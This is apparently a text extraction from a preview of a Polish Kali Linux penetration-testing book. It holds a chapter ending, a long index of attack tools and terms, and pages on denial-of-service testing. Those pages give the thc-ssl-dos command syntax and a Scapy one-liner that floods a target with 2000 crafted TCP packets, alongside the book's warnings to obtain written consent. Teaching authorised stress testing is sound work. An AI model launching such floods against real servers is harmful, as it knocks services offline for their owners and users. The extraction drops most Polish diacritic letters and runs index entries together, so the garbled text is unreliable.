wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 33: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

